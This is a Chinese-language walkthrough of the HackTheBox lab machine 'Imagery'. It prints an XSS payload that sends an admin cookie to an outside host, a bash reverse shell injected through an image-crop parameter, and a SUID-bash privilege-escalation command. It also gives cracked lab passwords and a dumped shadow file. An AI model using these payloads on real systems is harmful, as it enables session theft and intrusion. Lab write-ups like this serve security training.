HTB-Imagery

扫描靶机

1
nmap -A -v 10.10.11.88

图片

就两个端口,有个8000端口可以访问,把imagery.htb放到host然后访问一下

图片

进入后可以看到右上角个注册和登录按钮,先注册然后登陆进去

图片

图片

有个upload按钮,可以上传图片格式的文件,先尝试上传图片

图片

在自己的图库里面可以看到刚刚上传的图片,并且可以下载删除,但是不能传送和修改图片,估计需要admin账号,查看一下登陆框有没有xss漏洞

image-20260203225644950

看来啥也没有,看一下页面,可以发现最底下有个有个Report bug的按钮

image-20260203225636642

这个是用来报告图库的bug使用

图片

测试一下有没有xss漏洞,用bp抓包,可以看到有返回请求,不断的发请求

image-20260203225620833

利用xss漏洞拿到admin的cookie

1
<img src=1 onerror="document.location='http://10.10.14.24/cxk/'+ document.cookie"></img>

成功的拿到了admin的cookie,然后将cookie写到后台,更新重新打开网站

图片

图片

图片

image-20260203225540813

可以看到有很多日志可以下载,使用bp抓包

image-20260203225530787

可以看到下载成功了,将日志修改为系统文件路径看看是否能读取

image-20260203225524584

可以找到一个LFI漏洞,利用该漏洞在home那里可以找到db文件

image-20260203225456407

图片

成功的拿到了一个admin账号,然后将这些哈希破解了

图片

拿到了一个密码:iambatman,那是testuser的密码,登陆他的账号看看

image-20260203225423324

可以看到这个用户拥有所有的功能,点三点那里,可以看到有个Transform传输功能

图片

选择第一个剪切功能,然后会教你设置长宽高,然后直接抓包

图片

使用bp抓包,在x坐标那里,可以输入命令

1
/bin/bash -c \" /bin/bash -i 5<> /dev/tcp/10.10.14.121/4444 0<&5 1>&5 2>&5\

图片

成功的拿到了shell,上传linpeass看看有没有可以提权的东西

image-20260203225303444

可以看到在backup那里有个aes加密的文件,将其下载到本地,然后破解

图片

可以看到在backup那里有个aes加密的文件,将其下载到本地,然后破解

image-20260203225232560

成功破解了,然后密码是bestfriends,然后解压zip

图片

里面有个db.json,打开后可以看到有个mark用户的,估计是ssh的账号,破解了哈希然后等

图片

图片

可以得知密码是supersmash,然后登陆ssh,发现是登陆不了的ssh,看来只能直接su

图片

图片

成功的拿到了user flag,输入sudo -l可以查看提权信息

image-20260203225122851

通过charcol提权,输入—help查看一下命令参数信息

图片

可以看到-R参数那个可以密码重置,重置的是charcol登陆,直接使用-R参数

image-20260203225036598

可以看到密码已经重置了,直接使用shell命令,这样就进入了没密码模式

image-20260203225024490

image-20260203225015473

再次进去,输入help可以得知该终端的命令参数,直接输入命令提权

1
auto add --schedule "* * * * *" --command "chmod +s /usr/bin/bash" --name "cxk"

image-20260203224952612

然后等一下就会autbot就会自动提权

image-20260203224925538

成功拿到了root flag

1
root:$y$j9T$OVSThp/6ybogilellugDf.$Le2uXxNfrXRiH18puL.GI7fnu2hYxttVASa.OMFvjs4:20286:0:99999:7:::daemon:*:20003:0:99999:7:::bin:*:20003:0:99999:7:::sys:*:20003:0:99999:7:::sync:*:20003:0:99999:7:::games:*:20003:0:99999:7:::man:*:20003:0:99999:7:::lp:*:20003:0:99999:7:::mail:*:20003:0:99999:7:::news:*:20003:0:99999:7:::uucp:*:20003:0:99999:7:::proxy:*:20003:0:99999:7:::www-data:*:20003:0:99999:7:::backup:*:20003:0:99999:7:::list:*:20003:0:99999:7:::irc:*:20003:0:99999:7:::_apt:*:20003:0:99999:7:::nobody:*:20003:0:99999:7:::systemd-network:!*:20003::::::usbmux:!:20003::::::systemd-timesync:!*:20003::::::messagebus:!:20003::::::systemd-resolve:!*:20003::::::pollinate:!:20003::::::polkitd:!*:20003::::::syslog:!:20003::::::uuidd:!:20003::::::tcpdump:!:20003::::::tss:!:20003::::::landscape:!:20003::::::fwupd-refresh:!*:20003::::::web:$y$j9T$bSJcB7IM6SVHob8SVJQ2X/$L16rTrWlInaJ6EvPTXO3CTiUP88xtNClzOJkwXIIL0D:20303:0:99999:7:::sshd:!:20283::::::snapd-range-524288-root:!:20283::::::snap_daemon:!:20283::::::mark:$y$j9T$m1reIJvzn7/7hhJ26v8WV1$3zPWU7HPsUn0P133BsMZDar.XmDq1T3AbJrfi.Nc6x3:20350:0:99999:7:::_laurel:!:20353::::::

过程中有参考大佬zorejt